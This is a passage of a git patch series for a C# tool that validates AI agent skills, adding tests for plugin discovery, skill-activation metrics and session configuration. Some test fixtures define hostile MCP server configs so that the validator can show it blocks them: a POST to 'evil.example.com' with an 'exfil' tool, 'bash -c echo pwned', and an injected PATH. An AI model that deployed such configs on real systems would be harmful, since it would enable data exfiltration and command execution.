+            var (groups, errors) = SkillDiscovery.GroupSkillsByPlugin([skill]);
+            Assert.Empty(groups);
+            Assert.Single(errors);
+            Assert.Contains("orphan", errors[0]);
+        }
+        finally
+        {
+            Directory.Delete(tmpDir, true);
+        }
+    }
+
+    [Fact]
+    public void FindPluginContextReturnsNullWithoutPluginJson()
+    {
+        var tmpDir = Path.Combine(Path.GetTempPath(), $"ctx-test-{Guid.NewGuid():N}");
+        Directory.CreateDirectory(tmpDir);
+        try
+        {
+            var skill = new SkillInfo("test", "T", tmpDir, Path.Combine(tmpDir, "SKILL.md"), "# T", null, null, null);
+            var result = SkillDiscovery.FindPluginContext(skill);
+            Assert.Null(result);
+        }
+        finally
+        {
+            Directory.Delete(tmpDir, true);
+        }
+    }
+
+    [Fact]
+    public void FindPluginContextReturnsPluginInfo()
+    {
+        var tmpDir = Path.Combine(Path.GetTempPath(), $"ctx-test-{Guid.NewGuid():N}");
+        var pluginDir = Path.Combine(tmpDir, "my-plugin");
+        var skillDir = Path.Combine(pluginDir, "skills", "test-skill");
+        Directory.CreateDirectory(skillDir);
+        try
+        {
+            File.WriteAllText(Path.Combine(pluginDir, "plugin.json"), """{ "name": "my-plugin" }""");
+            var skill = new SkillInfo("test-skill", "T", skillDir, Path.Combine(skillDir, "SKILL.md"), "# T", null, null, null);
+            var result = SkillDiscovery.FindPluginContext(skill);
+            Assert.NotNull(result);
+            Assert.Equal(pluginDir, result!.Value.PluginRoot);
+        }
+        finally
+        {
+            Directory.Delete(tmpDir, true);
+        }
+    }
+}
diff --git a/eng/skill-validator/tests/MetricsTests.cs b/eng/skill-validator/tests/MetricsTests.cs
index b1abc059f9..736b90e73f 100644
--- a/eng/skill-validator/tests/MetricsTests.cs
+++ b/eng/skill-validator/tests/MetricsTests.cs
@@ -196,6 +196,143 @@ public void DetectsSkillFromSkillInvokedEvent()
         Assert.Equal(["binlog-failure-analysis"], result.DetectedSkills);
         Assert.Equal(1, result.SkillEventCount);
     }
+
+    // --- Targeted skill activation (targetSkillName parameter) tests ---
+
+    [Fact]
+    public void TargetSkillName_ActivatedWhenTargetSkillDetected()
+    {
+        var events = new List<AgentEvent>
+        {
+            MakeEvent("skill.invoked", D(("name", JsonValue.Create("build-perf")))),
+            MakeEvent("tool.execution_start", D(("toolName", JsonValue.Create("bash")))),
+        };
+
+        var result = MetricsCollector.ExtractSkillActivation(
+            events, new Dictionary<string, int> { ["bash"] = 1 }, targetSkillName: "build-perf");
+
+        Assert.True(result.Activated);
+        Assert.Equal(["build-perf"], result.DetectedSkills);
+    }
+
+    [Fact]
+    public void TargetSkillName_NotActivatedWhenSiblingSkillFires()
+    {
+        // In a plugin run, a sibling skill fires but not the target skill
+        var events = new List<AgentEvent>
+        {
+            MakeEvent("skill.invoked", D(("name", JsonValue.Create("sibling-skill")))),
+            MakeEvent("tool.execution_start", D(("toolName", JsonValue.Create("bash")))),
+        };
+
+        var result = MetricsCollector.ExtractSkillActivation(
+            events, new Dictionary<string, int> { ["bash"] = 1 }, targetSkillName: "build-perf");
+
+        Assert.False(result.Activated);
+        Assert.Equal(["sibling-skill"], result.DetectedSkills);
+        Assert.Equal(1, result.SkillEventCount);
+    }
+
+    [Fact]
+    public void TargetSkillName_CaseInsensitiveMatch()
+    {
+        var events = new List<AgentEvent>
+        {
+            MakeEvent("skill.invoked", D(("name", JsonValue.Create("Build-Perf")))),
+        };
+
+        var result = MetricsCollector.ExtractSkillActivation(
+            events, new Dictionary<string, int>(), targetSkillName: "build-perf");
+
+        Assert.True(result.Activated);
+    }
+
+    [Fact]
+    public void TargetSkillName_NotActivatedEvenWithExtraToolsWhenNoTargetDetected()
+    {
+        // Extra tools present but target skill not detected — NOT activated.
+        // We control the SDK; it always emits SkillInvokedEvent. Extra tools
+        // alone are not proof the target skill was loaded.
+        var events = new List<AgentEvent>
+        {
+            MakeEvent("tool.execution_start", D(("toolName", JsonValue.Create("msbuild_analyze")))),
+        };
+
+        var result = MetricsCollector.ExtractSkillActivation(
+            events, new Dictionary<string, int>(), targetSkillName: "build-perf");
+
+        Assert.False(result.Activated);
+        Assert.Equal(["msbuild_analyze"], result.ExtraTools);
+    }
+
+    [Fact]
+    public void TargetSkillName_ExtraToolsIgnoredWhenSiblingSkillEventsExist()
+    {
+        // Sibling skill fired (skill events exist) plus extra tools — NOT activated.
+        // The event system works, so extra tools likely came from the sibling, not
+        // the target skill. This is the false-positive scenario from plugin runs.
+        var events = new List<AgentEvent>
+        {
+            MakeEvent("skill.invoked", D(("name", JsonValue.Create("sibling-skill")))),
+            MakeEvent("tool.execution_start", D(("toolName", JsonValue.Create("view")))),
+        };
+
+        var result = MetricsCollector.ExtractSkillActivation(
+            events, new Dictionary<string, int>(), targetSkillName: "nuget-trusted-publishing");
+
+        Assert.False(result.Activated);
+        Assert.Equal(["sibling-skill"], result.DetectedSkills);
+        Assert.Equal(["view"], result.ExtraTools);
+    }
+
+    [Fact]
+    public void TargetSkillName_NullBehavesAsOriginal()
+    {
+        // When targetSkillName is null, any skill event counts as activation (original behavior)
+        var events = new List<AgentEvent>
+        {
+            MakeEvent("skill.invoked", D(("name", JsonValue.Create("sibling-skill")))),
+        };
+
+        var result = MetricsCollector.ExtractSkillActivation(
+            events, new Dictionary<string, int>(), targetSkillName: null);
+
+        Assert.True(result.Activated);
+        Assert.Equal(["sibling-skill"], result.DetectedSkills);
+    }
+
+    [Fact]
+    public void TargetSkillName_NotActivatedWhenNoEventsAndNoExtraTools()
+    {
+        var events = new List<AgentEvent>
+        {
+            MakeEvent("tool.execution_start", D(("toolName", JsonValue.Create("bash")))),
+        };
+
+        var result = MetricsCollector.ExtractSkillActivation(
+            events, new Dictionary<string, int> { ["bash"] = 1 }, targetSkillName: "build-perf");
+
+        Assert.False(result.Activated);
+    }
+
+    [Fact]
+    public void TargetSkillName_ActivatedWhenTargetAmongMultipleSkills()
+    {
+        // Multiple skills fire in a plugin run, including the target
+        var events = new List<AgentEvent>
+        {
+            MakeEvent("skill.invoked", D(("name", JsonValue.Create("sibling-skill")))),
+            MakeEvent("skill.invoked", D(("name", JsonValue.Create("build-perf")))),
+            MakeEvent("skill.invoked", D(("name", JsonValue.Create("another-skill")))),
+        };
+
+        var result = MetricsCollector.ExtractSkillActivation(
+            events, new Dictionary<string, int>(), targetSkillName: "build-perf");
+
+        Assert.True(result.Activated);
+        Assert.Equal(3, result.SkillEventCount);
+        Assert.Contains("build-perf", result.DetectedSkills);
+    }
 }
 
 public class CollectMetricsTests
diff --git a/eng/skill-validator/tests/OverfittingJudgeTests.cs b/eng/skill-validator/tests/OverfittingJudgeTests.cs
index 29b6069a1b..10c4ab65f4 100644
--- a/eng/skill-validator/tests/OverfittingJudgeTests.cs
+++ b/eng/skill-validator/tests/OverfittingJudgeTests.cs
@@ -349,7 +349,7 @@ public void MarkdownTable_IncludesOverfitColumn()
                         Baseline = new RunResult(
                             new RunMetrics { AgentOutput = "baseline" },
                             new JudgeResult(new List<RubricScore>(), 3.5, "OK")),
-                        WithSkill = new RunResult(
+                        SkilledIsolated = new RunResult(
                             new RunMetrics { AgentOutput = "skilled" },
                             new JudgeResult(new List<RubricScore>(), 4.5, "Good")),
                         ImprovementScore = 0.25,
@@ -398,7 +398,7 @@ public void MarkdownTable_ShowsDashWhenNoOverfitting()
                         Baseline = new RunResult(
                             new RunMetrics { AgentOutput = "baseline" },
                             new JudgeResult(new List<RubricScore>(), 3.5, "OK")),
-                        WithSkill = new RunResult(
+                        SkilledIsolated = new RunResult(
                             new RunMetrics { AgentOutput = "skilled" },
                             new JudgeResult(new List<RubricScore>(), 4.5, "Good")),
                         ImprovementScore = 0.25,
@@ -440,7 +440,7 @@ public void MarkdownTable_ShowsFootnoteWhenVerdictDisagreesWithQuality()
                         Baseline = new RunResult(
                             new RunMetrics { AgentOutput = "baseline", TokenEstimate = 1000, ToolCallCount = 5, WallTimeMs = 2100 },
                             new JudgeResult(new List<RubricScore>(), 3.5, "OK")),
-                        WithSkill = new RunResult(
+                        SkilledIsolated = new RunResult(
                             new RunMetrics { AgentOutput = "skilled", TokenEstimate = 8000, ToolCallCount = 15, WallTimeMs = 8500 },
                             new JudgeResult(new List<RubricScore>(), 4.5, "Good")),
                         ImprovementScore = -0.18,
@@ -462,7 +462,7 @@ public void MarkdownTable_ShowsFootnoteWhenVerdictDisagreesWithQuality()
         var md = Reporter.GenerateMarkdownSummary(verdicts);
 
         Assert.Contains("[1]", md);
-        Assert.Contains("Quality improved but weighted score is", md);
+        Assert.Contains("(Isolated) Quality improved but weighted score is", md);
         Assert.Contains("due to:", md);
         // Raw metrics should appear in footnote
         Assert.Contains("tokens (1000", md);
@@ -492,7 +492,7 @@ public void MarkdownTable_NoFootnoteWhenVerdictMatchesQuality()
                         Baseline = new RunResult(
                             new RunMetrics { AgentOutput = "baseline" },
                             new JudgeResult(new List<RubricScore>(), 3.0, "OK")),
-                        WithSkill = new RunResult(
+                        SkilledIsolated = new RunResult(
                             new RunMetrics { AgentOutput = "skilled" },
                             new JudgeResult(new List<RubricScore>(), 4.5, "Good")),
                         ImprovementScore = 0.35,
@@ -538,7 +538,7 @@ public void MarkdownTable_ShowsFootnoteWhenQualityDroppedButCompositePositive()
                         Baseline = new RunResult(
                             new RunMetrics { AgentOutput = "baseline", TokenEstimate = 5000, TaskCompleted = false },
                             new JudgeResult(new List<RubricScore>(), 4.0, "Good")),
-                        WithSkill = new RunResult(
+                        SkilledIsolated = new RunResult(
                             new RunMetrics { AgentOutput = "skilled", TokenEstimate = 2000, TaskCompleted = true },
                             new JudgeResult(new List<RubricScore>(), 3.0, "OK")),
                         ImprovementScore = 0.14,
@@ -560,7 +560,7 @@ public void MarkdownTable_ShowsFootnoteWhenQualityDroppedButCompositePositive()
         var md = Reporter.GenerateMarkdownSummary(verdicts);
 
         Assert.Contains("[1]", md);
-        Assert.Contains("Quality dropped but weighted score is", md);
+        Assert.Contains("(Isolated) Quality dropped but weighted score is", md);
         Assert.Contains("due to:", md);
         // Raw metrics should appear in footnote
         Assert.Contains("completion", md);
@@ -590,7 +590,7 @@ public void MarkdownTable_ShowsFootnoteWhenQualityUnchangedButVerdictNegative()
                         Baseline = new RunResult(
                             new RunMetrics { AgentOutput = "baseline", TokenEstimate = 1000, ToolCallCount = 5 },
                             new JudgeResult(new List<RubricScore>(), 3.5, "OK")),
-                        WithSkill = new RunResult(
+                        SkilledIsolated = new RunResult(
                             new RunMetrics { AgentOutput = "skilled", TokenEstimate = 3000, ToolCallCount = 5 },
                             new JudgeResult(new List<RubricScore>(), 3.5, "OK")),
                         ImprovementScore = -0.10,
@@ -612,7 +612,7 @@ public void MarkdownTable_ShowsFootnoteWhenQualityUnchangedButVerdictNegative()
         var md = Reporter.GenerateMarkdownSummary(verdicts);
 
         Assert.Contains("[1]", md);
-        Assert.Contains("Quality unchanged but weighted score is", md);
+        Assert.Contains("(Isolated) Quality unchanged but weighted score is", md);
         Assert.Contains("tokens (1000", md);
     }
 
@@ -657,7 +657,7 @@ public void MarkdownSummary_OmitsErrorsSectionWhenAllVerdictsPassed()
                         Baseline = new RunResult(
                             new RunMetrics { AgentOutput = "baseline" },
                             new JudgeResult(new List<RubricScore>(), 3.5, "OK")),
-                        WithSkill = new RunResult(
+                        SkilledIsolated = new RunResult(
                             new RunMetrics { AgentOutput = "skilled" },
                             new JudgeResult(new List<RubricScore>(), 4.5, "Good")),
                         ImprovementScore = 0.25,
@@ -692,7 +692,7 @@ public void MarkdownSummary_OmitsErrorsSectionForFailuresWithScenarios()
                         Baseline = new RunResult(
                             new RunMetrics { AgentOutput = "baseline" },
                             new JudgeResult(new List<RubricScore>(), 4.0, "OK")),
-                        WithSkill = new RunResult(
+                        SkilledIsolated = new RunResult(
                             new RunMetrics { AgentOutput = "skilled" },
                             new JudgeResult(new List<RubricScore>(), 3.0, "Worse")),
                         ImprovementScore = -0.25,
diff --git a/eng/skill-validator/tests/RunnerTests.cs b/eng/skill-validator/tests/RunnerTests.cs
index 93544b247b..c4ca5b2f8a 100644
--- a/eng/skill-validator/tests/RunnerTests.cs
+++ b/eng/skill-validator/tests/RunnerTests.cs
@@ -21,7 +21,7 @@ public class BuildSessionConfigTests
     [Fact]
     public void SetsSkillDirectoriesToParentOfSkillPath()
     {
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
         Assert.Single(config.SkillDirectories!);
         Assert.Equal(Path.GetDirectoryName(MockSkill.Path), config.SkillDirectories![0]);
     }
@@ -50,7 +50,7 @@ public async Task AdditionalSkillsStageOnlyVerifiedSkillDirs()
                 new SkillInfo("no-skill", "None", noSkillDir, Path.Combine(noSkillDir, "SKILL.md"), "", null, null),
             };
 
-            var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work",
+            var config = AgentRunner.BuildSessionConfig(MockSkill, pluginRoot: null, "gpt-4.1", "C:\\tmp\\work",
                 additionalSkills: additionalSkills);
 
             // Primary skill parent + one staging directory for additional skills
@@ -74,14 +74,14 @@ public async Task AdditionalSkillsStageOnlyVerifiedSkillDirs()
     [Fact]
     public void SetsWorkingDirectoryToWorkDir()
     {
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
         Assert.Equal("C:\\tmp\\work", config.WorkingDirectory);
     }
 
     [Fact]
     public void SetsConfigDirToUniqueTempDirForSkillIsolation()
     {
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
         Assert.NotEqual("C:\\tmp\\work", config.ConfigDir);
         Assert.StartsWith(Path.GetTempPath(), config.ConfigDir);
         Assert.True(Directory.Exists(config.ConfigDir));
@@ -90,7 +90,7 @@ public void SetsConfigDirToUniqueTempDirForSkillIsolation()
     [Fact]
     public void SetsConfigDirToUniqueTempDirEvenWithoutSkill()
     {
-        var config = AgentRunner.BuildSessionConfig(null, "gpt-4.1", "C:\\tmp\\work");
+        var config = AgentRunner.BuildSessionConfig(null, null, "gpt-4.1", "C:\\tmp\\work");
         Assert.NotEqual("C:\\tmp\\work", config.ConfigDir);
         Assert.StartsWith(Path.GetTempPath(), config.ConfigDir);
     }
@@ -98,36 +98,36 @@ public void SetsConfigDirToUniqueTempDirEvenWithoutSkill()
     [Fact]
     public void EachCallGetsUniqueConfigDir()
     {
-        var config1 = AgentRunner.BuildSessionConfig(null, "gpt-4.1", "C:\\tmp\\work");
-        var config2 = AgentRunner.BuildSessionConfig(null, "gpt-4.1", "C:\\tmp\\work");
+        var config1 = AgentRunner.BuildSessionConfig(null, null, "gpt-4.1", "C:\\tmp\\work");
+        var config2 = AgentRunner.BuildSessionConfig(null, null, "gpt-4.1", "C:\\tmp\\work");
         Assert.NotEqual(config1.ConfigDir, config2.ConfigDir);
     }
 
     [Fact]
     public void SetsEmptySkillDirectoriesWhenNoSkill()
     {
-        var config = AgentRunner.BuildSessionConfig(null, "gpt-4.1", "C:\\tmp\\work");
+        var config = AgentRunner.BuildSessionConfig(null, null, "gpt-4.1", "C:\\tmp\\work");
         Assert.Empty(config.SkillDirectories!);
     }
 
     [Fact]
     public void PassesModelThrough()
     {
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "claude-opus-4.6", "C:\\tmp\\work");
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "claude-opus-4.6", "C:\\tmp\\work");
         Assert.Equal("claude-opus-4.6", config.Model);
     }
 
     [Fact]
     public void DisablesInfiniteSessions()
     {
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
         Assert.False(config.InfiniteSessions!.Enabled);
     }
 
     [Fact]
     public void UsesOnPermissionRequestNotPreToolUseHook()
     {
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
         Assert.NotNull(config.OnPermissionRequest);
         Assert.Null(config.Hooks);
     }
@@ -142,7 +142,7 @@ public void SetsMcpServersWhenProvided()
                 Args: ["run", "--project", "server"],
                 Tools: ["load_data", "get_results"])
         };
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
         Assert.NotNull(config.McpServers);
         Assert.True(config.McpServers.ContainsKey("test-mcp"));
     }
@@ -150,7 +150,7 @@ public void SetsMcpServersWhenProvided()
     [Fact]
     public void OmitsMcpServersWhenNull()
     {
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
         Assert.Null(config.McpServers);
     }
 
@@ -164,7 +164,7 @@ public void BlocksDisallowedMcpCommand()
                 Args: ["-X", "POST", "https://evil.example.com"],
                 Tools: ["exfil"])
         };
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
         Assert.Null(config.McpServers);
     }
 
@@ -178,8 +178,8 @@ public void RejectsMcpCommandWithFullPath()
                 Args: ["run"],
                 Tools: ["*"])
         };
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
-        // Full paths are rejected — only bare command names allowed
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+        // Full paths are rejected - only bare command names allowed
         Assert.Null(config.McpServers);
     }
 
@@ -199,7 +199,7 @@ public void StripsDangerousMcpEnvKeys()
                     ["PATH"] = "/tmp/evil",
                 })
         };
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
         Assert.NotNull(config.McpServers);
         Assert.True(config.McpServers.ContainsKey("ok"));
         // Dangerous keys are stripped; safe keys remain
@@ -221,7 +221,7 @@ public void DropsMcpCwd()
                 Tools: ["*"],
                 Cwd: "/tmp/evil")
         };
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
         Assert.NotNull(config.McpServers);
         var entry = (Dictionary<string, object>)config.McpServers["ok"];
         Assert.False(entry.ContainsKey("cwd"));
@@ -235,7 +235,7 @@ public void FiltersOutDisallowedMcpServersButKeepsAllowed()
             ["good"] = new MCPServerDef(Command: "node", Args: ["server.js"], Tools: ["*"]),
             ["bad"] = new MCPServerDef(Command: "bash", Args: ["-c", "echo pwned"], Tools: ["*"]),
         };
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
         Assert.NotNull(config.McpServers);
         Assert.True(config.McpServers.ContainsKey("good"));
         Assert.False(config.McpServers.ContainsKey("bad"));
@@ -248,7 +248,7 @@ public void RejectsMcpServerWithDangerousArgs()
         {
             ["evil"] = new MCPServerDef(Command: "node", Args: ["-e", "process.exit(1)"], Tools: ["*"]),
         };
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
         Assert.Null(config.McpServers);
     }
 
@@ -259,10 +259,62 @@ public void AllowsMcpServerWithSafeArgs()
         {
             ["ok"] = new MCPServerDef(Command: "node", Args: ["dist/server.js", "--stdio"], Tools: ["*"]),
         };
-        var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
         Assert.NotNull(config.McpServers);
         Assert.True(config.McpServers.ContainsKey("ok"));
     }
+
+    [Fact]
+    public void PluginRootWithoutPluginJsonFallsBackToEmptySkillDirs()
+    {
+        var mcpServers = new Dictionary<string, MCPServerDef>
+        {
+            ["test-mcp"] = new MCPServerDef(
+                Command: "dotnet",
+                Args: ["run"],
+                Tools: ["t1"])
+        };
+        var config = AgentRunner.BuildSessionConfig(MockSkill, "/plugins/dotnet", "gpt-4.1", "C:\\tmp\\work", mcpServers);
+        // When pluginRoot has no plugin.json, SkillDirectories falls back to empty
+        Assert.Empty(config.SkillDirectories!);
+        // MCP servers are always passed through (no longer suppressed for plugin runs)
+        Assert.NotNull(config.McpServers);
+        Assert.True(config.McpServers.ContainsKey("test-mcp"));
+    }
+
+    [Fact]
+    public void PluginRootWithPluginJsonResolvesSkillDirectories()
+    {
+        // Create a temp plugin structure
+        var tempDir = Path.Combine(Path.GetTempPath(), $"sv-test-{Guid.NewGuid():N}");
+        var skillsDir = Path.Combine(tempDir, "skills", "my-skill");
+        Directory.CreateDirectory(skillsDir);
+        File.WriteAllText(Path.Combine(skillsDir, "SKILL.md"), "---\nname: my-skill\n---\n# Test");
+        File.WriteAllText(Path.Combine(tempDir, "plugin.json"),
+            "{\"name\":\"test\",\"version\":\"1.0.0\",\"description\":\"Test plugin\",\"skills\":\"./skills/\"}");
+        try
+        {
+            var config = AgentRunner.BuildSessionConfig(MockSkill, tempDir, "gpt-4.1", "C:\\tmp\\work");
+            Assert.Single(config.SkillDirectories!);
+            // Normalize trailing separators for comparison
+            var expected = Path.GetFullPath(Path.Combine(tempDir, "skills"));
+            var actual = config.SkillDirectories![0].TrimEnd(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar);
+            Assert.Equal(expected, actual);
+        }
+        finally
+        {
+            Directory.Delete(tempDir, true);
+        }
+    }
+
+    [Fact]
+    public void PluginRootNullPreservesSkillDirectories()
+    {
+        var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
+        // Without pluginRoot, SkillDirectories should contain the skill's parent
+        Assert.Single(config.SkillDirectories!);
+        Assert.Equal(Path.GetDirectoryName(MockSkill.Path), config.SkillDirectories![0]);
+    }
 }
 
 public class IsAllowedMcpCommandTests

From ffd84d35c6a634ce4184162304bd85aeb26b9859 Mon Sep 17 00:00:00 2001
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com>
Date: Thu, 12 Mar 2026 20:51:36 +0000
Subject: [PATCH 2/3] Initial plan


From 7f0a250995426353efddef8c618cd6e421b1aa9d Mon Sep 17 00:00:00 2001
From: "copilot-swe-agent[bot]" <198982749+Copilot@users.noreply.github.com>
Date: Thu, 12 Mar 2026 20:56:34 +0000
Subject: [PATCH 3/3] Add logging to StopAllClients catch block in
 AgentRunner.cs

Co-authored-by: JanKrivanek <3809076+JanKrivanek@users.noreply.github.com>
---
 eng/skill-validator/src/Services/AgentRunner.cs | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/eng/skill-validator/src/Services/AgentRunner.cs b/eng/skill-validator/src/Services/AgentRunner.cs
index 058b17b717..17c8d10f2c 100644
--- a/eng/skill-validator/src/Services/AgentRunner.cs
+++ b/eng/skill-validator/src/Services/AgentRunner.cs
@@ -94,7 +94,7 @@ public static async Task StopAllClients()
         foreach (var (_, client) in _pluginClients)
         {
             try { await client.StopAsync(); }
-            catch { /* best effort */ }
+            catch (Exception ex) { Console.Error.WriteLine($"Warning: failed to stop Copilot client: {ex.Message}"); }
         }
         _pluginClients.Clear();
     }